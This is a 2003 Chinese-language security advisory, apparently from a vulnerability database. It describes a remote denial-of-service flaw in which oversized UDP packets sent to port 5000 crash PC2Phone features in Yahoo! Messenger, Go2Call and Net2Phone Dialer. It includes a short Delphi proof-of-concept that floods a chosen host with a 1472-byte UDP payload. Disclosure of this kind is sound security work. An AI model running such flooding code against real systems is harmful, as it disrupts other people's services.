多家厂商PC2Phone软件远程拒绝服务漏洞
发布日期:2003-09-01
更新日期:2003-09-08
受影响系统:Yahoo! Messenger 5.5
Yahoo! Messenger 5.0.1232
Yahoo! Messenger 5.0.1065
Yahoo! Messenger 5.0.1046
Yahoo! Messenger 4.0
Go2Call Cash Calling
Net2Phone Net2Phone Dialer
Yahoo! Messenger 5.0
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
描述:
BUGTRAQ ID:
8523
pc2phone是利用网络进行电话聊天的工具。
pc2phone没有正确处理过大的UDP数据包,远程攻击者可以利用这个漏洞对软件进行拒绝服务攻击。
攻击者只要构建包含大量数据的UDP包,如1500字节,包含1472个字符的数据包提交给Pc2phone监听的5000端口,就可以导致程序崩溃,中断连接。目前还不知道具体漏洞细节。
其他如Yahoo messenger,Net2Phone dialer pc2phone都存在这个问题。
<*来源:Dima (
megapolus@hotbox.ru)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106256528500924&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Dima (
megapolus@hotbox.ru)提供了如下测试方法:
procedure TForm1.Button1Click(Sender: TObject);
var C:string;
N:integer;
MyStream:TMemoryStream;
begin
Memo1.Lines.Add('start');
C:=Edit3.Text; //for example 'AAAA...' 1472 char 'A' for certain
N:=strtoint(Edit4.Text);
NMUDP1.RemoteHost:=Edit1.Text;
NMUDP1.RemotePort:=strtoint(Edit2.Text);
MyStream:=TMemoryStream.Create;
try
MyStream.Write(C[1],Length(C));
for n:=1 to N do
begin
NMUDP1.SendStream(MyStream);
end;
finally
MyStream.Free;
end;
Memo1.Lines.Add('finish');
end;
建议:
厂商补丁:
Yahoo!
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://messenger.yahoo.com/messenger/phone.html
Go2Call
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.go2call.com/
Net2Phone
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://web.net2phone.com/products/commcenter/浏览次数:3130
严重程度:10(网友投票)